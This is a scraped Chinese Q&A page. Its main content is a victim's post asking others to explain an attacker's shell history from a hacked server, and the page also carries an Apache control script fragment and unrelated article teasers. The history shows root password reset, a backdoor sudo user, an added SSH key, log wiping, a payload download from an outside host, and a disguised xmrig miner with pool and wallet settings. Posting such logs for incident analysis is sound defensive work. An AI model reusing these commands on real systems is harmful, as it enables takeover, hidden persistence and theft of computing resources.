/># <br /># a command that outputs a formatted text version of the HTML at the <br /># url given on the command line.  Designed for lynx, however other <br /># programs may work.  <br />LYNX="lynx -dump" <br /># <br /># the URL to your server's mod_status status page.  If you do not <br /># have one, then status and fullstatus will not work. <br />STATUSURL="http://localhost:80/server-status" <br /># <br /># Set this variable to a command that increases the maximum <br /># number of file descriptors allowed per child process. This is <br /># critical for configurations that use many file descriptors, <br /># such as mass vhosting, or a multithreaded server. <br />ULIMIT_MAX_FILES="ulimit -S -n unlimited" <br /># --------------------                              -------------------- <br /># ||||||||||||||||||||   END CONFIGURATION SECTION  |||||||||||||||||||| <br /> <br /># Set the maximum number of file descriptors allowed per child process. <br />if [ "x$ULIMIT_MAX_FILES" != "x" ] ; then <br />    $ULIMIT_MAX_FILES <br />fi <br /> <br />ERROR=0 <br />if [ "x$ARGV" = "x" ] ; then <br />    ARGV="-h" <br />fi <br /> <br />case $ARGV in <br />start|stop|restart|graceful) <br />    $HTTPD -k $ARGV <br />    ERROR=$? <br />    ;; <br />startssl|sslstart|start-SSL) <br />    $HTTPD -k start -DSSL <br />    ERROR=$? <br />    ;; <br />configtest) <br />    $HTTPD -t <br />    ERROR=$? <br />    ;; <br />status) <br />    $LYNX $STATUSURL | awk ' /process$/ { print; exit } { print } ' <br />    ;; <br />fullstatus) <br />    $LYNX $STATUSURL <br />    ;; <br />*) <br />    $HTTPD $ARGV <br />    ERROR=$? <br />esac <br /> <br />exit $ERROR <br />------------------------------------------ <br />logs的纪录是 <br />Invalid argument: setgid: unable to set group id to Group 4294967295 (号码虚拟) <br /> <br />哪位xdjm帮忙解答一下 <br />谢谢! <br /> <br />&lt;/path&gt;
服务器被人攻击登录了,看了下操作记录,不知道有没有人能分析下这个人到底干了啥,想干啥?
### 如下是其操作记录: ```bash 516 2019-04-12 15:51:16 top 517 2019-04-12 15:51:26 kill -9 2796 518 2019-04-12 15:51:27 password='QwqQw3899qQrT41qw91' 519 2019-04-12 15:51:27 pkill -9 qW*; pkill -9 ddgs*; chattr -i /tmp/*; chmod -x /tmp/*; 520 2019-04-12 15:51:27 bash /CloudrResetPwdAgent/bin/cloudResetPwdAgent.script remove 521 2019-04-12 15:51:27 bash /CloudResetPwdUpdateAgent/bin/cloudResetPwdUpdateAgent.script remove 522 2019-04-12 15:51:27 rm -rf /CloudrResetPwdAgent 523 2019-04-12 15:51:27 rm -rf /var/log/secure 524 2019-04-12 15:51:27 rm -rf /var/log/auth.log 525 2019-04-12 15:51:27 rm -rf /CloudResetPwdUpdateAgent 526 2019-04-12 15:51:27 SALT="Q9" 527 2019-04-12 15:51:27 ln /usr/sbin/pidof /bin/pidof 528 2019-04-12 15:51:27 HASH=$(perl -e "print crypt("${password}",${SALT})") 529 2019-04-12 15:51:27 usermod --password ${HASH} root 530 2019-04-12 15:51:27 useradd cronjob 531 2019-04-12 15:51:27 usermod --password ${HASH} cronjob 532 2019-04-12 15:51:27 usermod -aG wheel cronjob 533 2019-04-12 15:51:27 usermod -aG root cronjob 534 2019-04-12 15:51:27 echo '%wheel ALL=(ALL) ALL' >> '/etc/sudoers' 535 2019-04-12 15:51:27 echo 'cronjob ALL=(ALL:ALL) ALL' >> '/etc/sudoers' 536 2019-04-12 15:51:27 grep -q -F '* soft memlock 262144' /etc/security/limits.conf || echo '* soft memlock 262144' >> /etc/security/limits.conf 537 2019-04-12 15:51:27 grep -q -F '* hard memlock 262144' /etc/security/limits.conf || echo '* hard memlock 262144' >> /etc/security/limits.conf 538 2019-04-12 15:51:27 grep -q -F 'vm.nr_hugepages = 256' /etc/sysctl.conf || echo 'vm.nr_hugepages = 256' >> /etc/sysctl.conf 539 2019-04-12 15:51:27 sysctl -w vm.nr_hugepages=256 540 2019-04-12 15:51:27 killall -9 -e 'b' -v 541 2019-04-12 15:51:27 killall -9 -e 'ps' -v 542 2019-04-12 15:51:27 killall -9 -e 'bbb' -v 543 2019-04-12 15:51:27 killall -9 -e 'ifconfig' -v 544 2019-04-12 15:51:27 killall -9 -e 'zjgw' -v 545 2019-04-12 15:51:27 killall -9 -e 'tsm' -v 546 2019-04-12 15:51:27 killall -9 -e 'sys4' -v 547 2019-04-12 15:51:27 killall -9 -e 'sshd65' -v 548 2019-04-12 15:51:27 chmod -x /tmp/.mountfs/.rsync/ /tmp/.mountfs/.rsync/* 549 2019-04-12 15:51:27 chattr +i -R /tmp/.mountfs/.rsync 550 2019-04-12 15:51:27 chmod -x /root/.ttp/* 551 2019-04-12 15:51:27 chattr +i -R /root/.ttp/ 552 2019-04-12 15:51:27 pkill mservice 553 2019-04-12 15:51:27 pkill xmrigMiner 554 2019-04-12 15:51:27 pkill xig 555 2019-04-12 15:51:27 pkill anacron 556 2019-04-12 15:51:27 pkill zigw 557 2019-04-12 15:51:27 pkill cd 558 2019-04-12 15:51:27 pkill systems 559 2019-04-12 15:51:27 pkill fmdkhiizka 560 2019-04-12 15:51:27 pkill bundle 561 2019-04-12 15:51:27 pkill whpclxj 562 2019-04-12 15:51:27 pkill qW3xT.4 563 2019-04-12 15:51:27 pkill ddgs.3014 564 2019-04-12 15:51:27 pkill sleep 565 2019-04-12 15:51:27 pkill -9 sleep 566 2019-04-12 15:51:27 pkill uqncnjpamg 567 2019-04-12 15:51:27 pkill rcu_sched 568 2019-04-12 15:51:27 pkill grep 569 2019-04-12 15:51:27 pkill sshd65 570 2019-04-12 15:51:27 pkill useradd 571 2019-04-12 15:51:27 pkill cnrig 572 2019-04-12 15:51:27 chmod -x /tmp/ddgs.3014 573 2019-04-12 15:51:27 chmod -x /tmp/qW3xT.4 574 2019-04-12 15:51:27 pkill rcu_bh 575 2019-04-12 15:51:27 pkill rcu_sched 576 2019-04-12 15:51:27 pkill fehulztdac 577 2019-04-12 15:51:27 pkill .xm.log 578 2019-04-12 15:51:27 pkill zjgw 579 2019-04-12 15:51:27 pkill hashfish 580 2019-04-12 15:51:27 pkill rngd 581 2019-04-12 15:51:27 pkill systemlog 582 2019-04-12 15:51:27 pkill -9 anacrontab 583 2019-04-12 15:51:27 pkill -9 hfxminer64 584 2019-04-12 15:51:27 chmod -x /tmp/systems1 585 2019-04-12 15:51:27 chmod -x /tmp/systems 586 2019-04-12 15:51:27 pkill systems1 587 2019-04-12 15:51:27 pkill systemxlv 588 2019-04-12 15:51:27 pkill systems 589 2019-04-12 15:51:27 pkill zjgw 590 2019-04-12 15:51:27 pkill .systemcero 591 2019-04-12 15:51:27 rm -rf /var/opt/.ssh/.rsync 592 2019-04-12 15:51:27 service YiluzhuanqianSer stop 593 2019-04-12 15:51:27 crontab -r 594 2019-04-12 15:51:27 chattr -iR /opt/yi*/* 595 2019-04-12 15:51:27 rm -rf /opt/yi* 596 2019-04-12 15:51:27 chmod -x /etc/btmpsys.sh /etc/wtmpsys.sh 597 2019-04-12 15:51:27 pkill wtmpsys.sh 598 2019-04-12 15:51:27 pkill etc/btmpsys.sh 599 2019-04-12 15:51:27 mkdir /opt 600 2019-04-12 15:51:27 mkdir /opt/nginx-0.12 601 2019-04-12 15:51:27 cd /opt 602 2019-04-12 15:51:27 chattr -i /usr/bin/wget 603 2019-04-12 15:51:27 chmod +x /usr/bin/wget 604 2019-04-12 15:51:27 tar xvf /opt/nginx-0.12.tar.gz -C /opt/nginx-0.12 605 2019-04-12 15:51:27 cd nginx-0.12 606 2019-04-12 15:51:27 mv xmrig-*/xmrig ssh-daemon 607 2019-04-12 15:51:27 mv xmrig-*/service service 608 2019-04-12 15:51:27 chmod +x ssh-daemon 609 2019-04-12 15:51:27 rm -rf config.json 610 2019-04-12 15:51:27 chattr +i ssh-daemon 611 2019-04-12 15:51:27 mkdir /opt/nu; 612 2019-04-12 15:51:27 cd /opt/nu; 613 2019-04-12 15:51:27 chattr +i config.json 614 2019-04-12 15:51:27 chattr +i service 615 2019-04-12 15:51:27 watch -n 5 pkill -9 qW3* &>/dev/null & 616 2019-04-12 15:51:27 watch -n 5 pkill -9 rpciod* &>/dev/null & 617 2019-04-12 15:51:27 mkdir ~/.ssh 618 2019-04-12 15:51:27 chmod -x /usr/bin/perl; chattr +i /usr/bin/perl; 619 2019-04-12 15:51:27 chmod -x /usr/cpu/-bash; chattr +i /usr/cpu/-bash 620 2019-04-12 15:51:27 rm -rf /var/log/* 621 2019-04-12 15:51:27 cd /opt/nu; 622 2019-04-12 15:51:27 echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxfc4Lg21YVxp3ajPJ6F6ZntEHOZEW0Jatz/oLvE+VXXoFJOaiqIibhWwjgJ7fro+ZKNrIUuBa3jQNuSo4E6cpR9UTQrjR+TTeJVDdTc8p0QLWo+vIkwCSyqRJmE41vIlrCTdBpPr1QlYILVKhfayYoLswPxguN+IG7Hv30p3NYfC1T8qKbi93xqrzd8JkmWDsincZ1M/0z1uz92kBZdYWKGDHtn0Rpkb0OjqcSQX6Cw4zZ3c8W+dG+UQrKP2wr/xSXVnA8fsQpJMCDT0UMFfOUal7BQF9CrwTGcuFQPetKdx5ujoBJV8MhZ7hL14eK2AnCafHzt9gOnyT7t+GttYB user@debian' > ~/.ssh/authorized_keys 623 2019-04-12 15:51:27 pkill -9 ssh-daemon; 624 2019-04-12 15:51:27 crontab -r; 625 2019-04-12 15:51:27 ln -s /bin/pidof /sbin/pidof; 626 2019-04-12 15:51:27 ln /usr/sbin/pidof /bin/pidof; 627 2019-04-12 15:51:27 apt-get install -y unzip; 628 2019-04-12 15:51:27 yum install -y unzip; 629 2019-04-12 15:51:28 wget --no-check-certificate http://8upload.ir/uploads/f8231241.zip -P /opt/nginx-0.12 -O /opt/renice-0.13.1.zip; 630 2019-04-12 15:52:16 unzip /opt/renice-0.13.1.zip -d /opt/nu/; 631 2019-04-12 15:52:16 mv /opt/nu/xmrig /opt/nu/renice; 632 2019-04-12 15:53:55 ls 633 2019-04-12 15:54:00 chattr -ia renice 634 2019-04-12 15:54:01 rm -rf renice 635 2019-04-12 15:54:04 mv xmrig ssh-daemon 636 2019-04-12 15:54:05 chmod +x ssh-daemon 637 2019-04-12 15:54:06 echo '{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": true, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 99, "pools": [ { "url": "de03.supportxmr.com:443", "user": "8AtHbYqFpSWgtcZJQcfWzQfEyyntFpc9URB26ZFUe7MzbWGqGVcXFosB1ve6Dkzb52REfzMYqTjuJbryDQSCR6sGR626EaU", "pass": "u", "rig-id": null, "nicehash": false, "keepalive": true, "variant": -1, "tls": true, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "user-agent": null, "watch": false }' > config.json; 638 2019-04-12 15:54:06 cd /opt/nu; 639 2019-04-12 15:54:06 mv renice ssh-daemon; 640 2019-04-12 15:54:06 sed -i -e 's/renice/ssh-daemon/g' /opt/nu/service; 641 2019-04-12 15:54:06 crontab /opt/nu/service; 642 2019-04-12 15:54:06 /opt/nu/ssh-daemon; 643 2019-04-12 15:54:06 echo 'alias top="top -o COMMAND"' >> ~/.bashrc;source ~/.bashrc; 644 2019-04-12 15:54:06 lscpu 645 2019-04-12 15:54:06 pidof ssh-daemon 646 2019-04-12 15:54:06 rm -rf /var/log/*; 647 2019-04-12 15:54:09 exit ```
终于明白阿里百度这样的大公司,为什么面试经常拿ThreadLocal考验求职者了
点击上面↑「爱开发」关注我们每晚10点,捕获技术思考和创业资源洞察什么是ThreadLocalThreadLocal是一个本地线程副本变量工具类,各个线程都拥有一份线程私有的数
程序员必须掌握的核心算法有哪些?
由于我之前一直强调数据结构以及算法学习的重要性,所以就有一些读者经常问我,数据结构与算法应该要学习到哪个程度呢?,说实话,这个问题我不知道要怎么回答你,主要取决于你想学习到哪些程度,不过针对这个问题,我稍微总结一下我学过的算法知识点,以及我觉得值得学习的算法。这些算法与数据结构的学习大多数是零散的,并没有一本把他们全部覆盖的书籍。下面是我觉得值得学习的一些算法以及数据结构,当然,我也会整理一些看过
Linux(服务器编程):15---两种高效的事件处理模式(reactor模式、proactor模式)
前言 同步I/O模型通常用于实现Reactor模式 异步I/O模型则用于实现Proactor模式 最后我们会使用同步I/O方式模拟出Proactor模式 一、Reactor模式 Reactor模式特点 它要求主线程(I/O处理单元)只负责监听文件描述符上是否有事件发生,有的话就立即将时间通知工作线程(逻辑单元)。除此之外,主线程不做任何其他实质性的工作 读写数据,接受新的连接,以及处...
阿里面试官问我:如何设计秒杀系统?我的回答让他比起大拇指
你知道的越多,你不知道的越多 点赞再看,养成习惯 GitHub上已经开源 https://github.com/JavaFamily 有一线大厂面试点脑图和个人联系方式,欢迎Star和指教 前言 Redis在互联网技术存储方面使用如此广泛,几乎所有的后端技术面试官都要在Redis的使用和原理方面对小伙伴们进行360°的刁难。 作为一个在互联网公司面一次拿一次Offer的面霸,打败了...
五年程序员记流水账式的自白。
不知觉已中码龄已突破五年,一路走来从起初铁憨憨到现在的十九线程序员,一路成长,虽然不能成为高工,但是也能挡下一面,从15年很火的android开始入坑,走过java、.Net、QT,目前仍处于android和.net交替开发中。 毕业到现在一共就职过两家公司,目前是第二家,公司算是半个创业公司,所以基本上都会身兼多职。比如不光要写代码,还要写软著、软著评测、线上线下客户对接需求收集...
C语言魔塔游戏
很早就很想写这个,今天终于写完了。 游戏截图: 编译环境: VS2017 游戏需要一些图片,如果有想要的或者对游戏有什么看法的可以加我的QQ 2985486630 讨论,如果暂时没有回应,可以在博客下方留言,到时候我会看到。 下面我来介绍一下游戏的主要功能和实现方式 首先是玩家的定义,使用结构体,这个名字是可以自己改变的 struct gamerole { char n
一文详尽系列之模型评估指标
点击上方“Datawhale”,选择“星标”公众号第一时间获取价值内容在机器学习领域通常会根据实际的业务场景拟定相应的不同的业务指标,针对不同机器学习问题如回归、分类、排...
究竟你适不适合买Mac?
我清晰的记得,刚买的macbook pro回到家,开机后第一件事情,就是上了淘宝网,花了500元钱,找了一个上门维修电脑的师傅,上门给我装了一个windows系统。。。。。。 表砍我。。。 当时买mac的初衷,只是想要个固态硬盘的笔记本,用来运行一些复杂的扑克软件。而看了当时所有的SSD笔记本后,最终决定,还是买个好(xiong)看(da)的。 已经有好几个朋友问我mba怎么样了,所以今天尽量客观
程序员一般通过什么途径接私活?
二哥,你好,我想知道一般程序猿都如何接私活,我也想接,能告诉我一些方法吗? 上面是一个读者“烦不烦”问我的一个问题。其实不止是“烦不烦”,还有很多读者问过我类似这样的问题。 我接的私活不算多,挣到的钱也没有多少,加起来不到 20W。说实话,这个数目说出来我是有点心虚的,毕竟太少了,大家轻喷。但我想,恰好配得上“一般程序员”这个称号啊。毕竟苍蝇再小也是肉,我也算是有经验的人了。 唾弃接私活、做外...
压测学习总结(1)——高并发性能指标:QPS、TPS、RT、吞吐量详解
一、QPS,每秒查询 QPS:Queries Per Second意思是“每秒查询率”,是一台服务器每秒能够相应的查询次数,是对一个特定的查询服务器在规定时间内所处理流量多少的衡量标准。互联网中,作为域名系统服务器的机器的性能经常用每秒查询率来衡量。 二、TPS,每秒事务 TPS:是TransactionsPerSecond的缩写,也就是事务数/秒。它是软件测试结果的测量单位。一个事务是指一...
Python爬虫爬取淘宝,京东商品信息
小编是一个理科生,不善长说一些废话。简单介绍下原理然后直接上代码。 使用的工具(Python+pycharm2019.3+selenium+xpath+chromedriver)其中要使用pycharm也可以私聊我selenium是一个框架可以通过pip下载 pip install selenium -i https://pypi.tuna.tsinghua.edu.cn/simple/ 
阿里程序员写了一个新手都写不出的低级bug,被骂惨了。
这种新手都不会范的错,居然被一个工作好几年的小伙子写出来,差点被当场开除了。
Java工作4年来应聘要16K最后没要,细节如下。。。
前奏: 今天2B哥和大家分享一位前几天面试的一位应聘者,工作4年26岁,统招本科。 以下就是他的简历和面试情况。 基本情况: 专业技能: 1、&nbsp;熟悉Sping了解SpringMVC、SpringBoot、Mybatis等框架、了解SpringCloud微服务 2、&nbsp;熟悉常用项目管理工具:SVN、GIT、MAVEN、Jenkins 3、&nbsp;熟悉Nginx、tomca
2020年,冯唐49岁:我给20、30岁IT职场年轻人的建议
点击“技术领导力”关注∆  每天早上8:30推送 作者| Mr.K   编辑| Emma 来源| 技术领导力(ID:jishulingdaoli) 前天的推文《冯唐:职场人35岁以后,方法论比经验重要》,收到了不少读者的反馈,觉得挺受启发。其实,冯唐写了不少关于职场方面的文章,都挺不错的。可惜大家只记住了“春风十里不如你”、“如何避免成为油腻腻的中年人”等不那么正经的文章。 本文整理了冯
程序员该看的几部电影
##1、骇客帝国(1999) 概念:在线/离线,递归,循环,矩阵等 剧情简介: 不久的将来,网络黑客尼奥对这个看似正常的现实世界产生了怀疑。 他结识了黑客崔妮蒂,并见到了黑客组织的首领墨菲斯。 墨菲斯告诉他,现实世界其实是由一个名叫“母体”的计算机人工智能系统控制,人们就像他们饲养的动物,没有自由和思想,而尼奥就是能够拯救人类的救世主。 可是,救赎之路从来都不会一帆风顺,到底哪里才是真实的世界?
Python绘图,圣诞树,花,爱心 | Turtle篇
每周每日,分享Python实战代码,入门资料,进阶资料,基础语法,爬虫,数据分析,web网站,机器学习,深度学习等等。 公众号回复【进群】沟通交流吧,QQ扫码进群学习吧 微信群 QQ群 1.画圣诞树 import turtle screen = turtle.Screen() screen.setup(800,600) circle = turtle.Turtle()...
作为一个程序员,CPU的这些硬核知识你必须会!
CPU对每个程序员来说,是个既熟悉又陌生的东西? 如果你只知道CPU是中央处理器的话,那可能对你并没有什么用,那么作为程序员的我们,必须要搞懂的就是CPU这家伙是如何运行的,尤其要搞懂它里面的寄存器是怎么一回事,因为这将让你从底层明白程序的运行机制。 随我一起,来好好认识下CPU这货吧 把CPU掰开来看 对于CPU来说,我们首先就要搞明白它是怎么回事,也就是它的内部构造,当然,CPU那么牛的一个东
还记得那个提速8倍的IDEA插件吗?VS Code版本也发布啦!!
去年,阿里云发布了本地 IDE 插件 Cloud Toolkit,仅 IntelliJ IDEA 一个平台,就有 15 万以上的开发者进行了下载,体验了一键部署带来的开发便利。时隔一年的今天,阿里云正式发布了 Visual Studio Code 版本,全面覆盖前端开发者,帮助前端实现一键打包部署,让开发提速 8 倍。 VSCode 版本的插件,目前能做到什么? 安装插件之后,开发者可以立即体验...
破14亿,Python分析我国存在哪些人口危机!
2020年1月17日,国家统计局发布了2019年国民经济报告,报告中指出我国人口突破14亿。 猪哥的朋友圈被14亿人口刷屏,但是很多人并没有看到我国复杂的人口问题:老龄化、男女比例失衡、生育率下降、人口红利下降等。 今天我们就来分析一下我们国家的人口数据吧! 一、背景 1.人口突破14亿 2020年1月17日,国家统计局发布了 2019年国民经济报告 ,报告中指出:年末中国大陆总人口(包括31个
2019年除夕夜的有感而发
天气:小雨(加小雪) 温度:3摄氏度 空气:严重污染(399) 风向:北风 风力:微风 现在是除夕夜晚上十点钟,再有两个小时就要新的一年了; 首先要说的是我没患病,至少现在是没有患病;但是心情确像患了病一样沉重; 现在这个时刻应该大部分家庭都在看春晚吧,或许一家人团团圆圆的坐在一起,或许因为某些特殊原因而不能团圆;但不管是身在何处,身处什么境地,我都想对每一个人说一句:新年快乐! 不知道csdn这...
听说想当黑客的都玩过这个Monyer游戏(1~14攻略)
第零关 进入传送门开始第0关(游戏链接) 请点击链接进入第1关: 连接在左边→ ←连接在右边 看不到啊。。。。(只能看到一堆大佬做完的留名,也能看到菜鸡的我,在后面~~) 直接fn+f12吧 &lt;span&gt;连接在左边→&lt;/span&gt; &lt;a href="first.php"&gt;&lt;/a&gt; &lt;span&gt;←连接在右边&lt;/span&gt; o...
在家远程办公效率低?那你一定要收好这个「在家办公」神器!
相信大家都已经收到国务院延长春节假期的消息,接下来,在家远程办公可能将会持续一段时间。 但是问题来了。远程办公不是人在电脑前就当坐班了,相反,对于沟通效率,文件协作,以及信息安全都有着极高的要求。有着非常多的挑战,比如: 1在异地互相不见面的会议上,如何提高沟通效率? 2文件之间的来往反馈如何做到及时性?如何保证信息安全? 3如何规划安排每天工作,以及如何进行成果验收? ......
作为一个程序员,内存和磁盘的这些事情,你不得不知道啊!!!
截止目前,我已经分享了如下几篇文章: 一个程序在计算机中是如何运行的?超级干货!!! 作为一个程序员,CPU的这些硬核知识你必须会! 作为一个程序员,内存的这些硬核知识你必须懂! 这些知识可以说是我们之前都不太重视的基础知识,可能大家在上大学的时候都学习过了,但是嘞,当时由于老师讲解的没那么有趣,又加上这些知识本身就比较枯燥,所以嘞,大家当初几乎等于没学。 再说啦,学习这些,也看不出来有什么用啊!
2020年的1月,我辞掉了我的第一份工作
其实,这篇文章,我应该早点写的,毕竟现在已经2月份了。不过一些其它原因,或者是我的惰性、还有一些迷茫的念头,让自己迟迟没有试着写一点东西,记录下,或者说是总结下自己前3年的工作上的经历、学习的过程。 我自己知道的,在写自己的博客方面,我的文笔很一般,非技术类的文章不想去写;另外我又是一个还比较热衷于技术的人,而平常复杂一点的东西,如果想写文章写的清楚点,是需要足够...
别低估自己的直觉,也别高估自己的智商
所有群全部吵翻天,朋友圈全部沦陷,公众号疯狂转发。这两周没怎么发原创,只发新闻,可能有人注意到了。我不是懒,是文章写了却没发,因为大家的关注力始终在这次的疫情上面,发了也没人看。当然,我...
这个世界上人真的分三六九等,你信吗?
偶然间,在知乎上看到一个问题 一时间,勾起了我深深的回忆。 以前在厂里打过两次工,做过家教,干过辅导班,做过中介。零下几度的晚上,贴过广告,满脸、满手地长冻疮。 再回首那段岁月,虽然苦,但让我学会了坚持和忍耐。让我明白了,在这个世界上,无论环境多么的恶劣,只要心存希望,星星之火,亦可燎原。 下文是原回答,希望能对你能有所启发。 如果我说,这个世界上人真的分三六九等,...
节后首个工作日,企业们集体开晨会让钉钉挂了
By 超神经场景描述:昨天 2 月 3 日,是大部分城市号召远程工作的第一天,全国有接近 2 亿人在家开始远程办公,钉钉上也有超过 1000 万家企业活跃起来。关键词:十一出行 人脸...
Java基础知识点梳理
Java基础知识点梳理 摘要: 虽然已经在实际工作中经常与java打交道,但是一直没系统地对java这门语言进行梳理和总结,掌握的知识也比较零散。恰好利用这段时间重新认识下java,并对一些常见的语法和知识点做个总结与回顾,一方面为了加深印象,方便后面查阅,一方面为了学好java打下基础。 Java简介 java语言于1995年正式推出,最开始被命名为Oak语言,由James Gosling(詹姆
2020年全新Java学习路线图,含配套视频,学完即为中级Java程序员!!
新的一年来临,突如其来的疫情打破了平静的生活! 在家的你是否很无聊,如果无聊就来学习吧! 世上只有一种投资只赚不赔,那就是学习!!! 传智播客于2020年升级了Java学习线路图,硬核升级,免费放送! 学完你就是中级程序员,能更快一步找到工作! 一、Java基础 JavaSE基础是Java中级程序员的起点,是帮助你从小白到懂得编程的必经之路。 在Java基础板块中有6个子模块的学
B 站上有哪些很好的学习资源?
哇说起B站,在小九眼里就是宝藏般的存在,放年假宅在家时一天刷6、7个小时不在话下,更别提今年的跨年晚会,我简直是跪着看完的!! 最早大家聚在在B站是为了追番,再后来我在上面刷欧美新歌和漂亮小姐姐的舞蹈视频,最近两年我和周围的朋友们已经把B站当作学习教室了,而且学习成本还免费,真是个励志的好平台ヽ(.◕ฺˇд ˇ◕ฺ;)ノ 下面我们就来盘点一下B站上优质的学习资源: 综合类 Oeasy: 综合
相关热词 c# 数组类型 泛型约束 c#的赛狗日程序 c# 传递数组 可变参数 c# 生成存储过程 c# list 补集 c#获得所有窗体 c# 当前秒数转成年月日 c#中的枚举 c# 计算校验和 连续随机数不重复c#
立即提问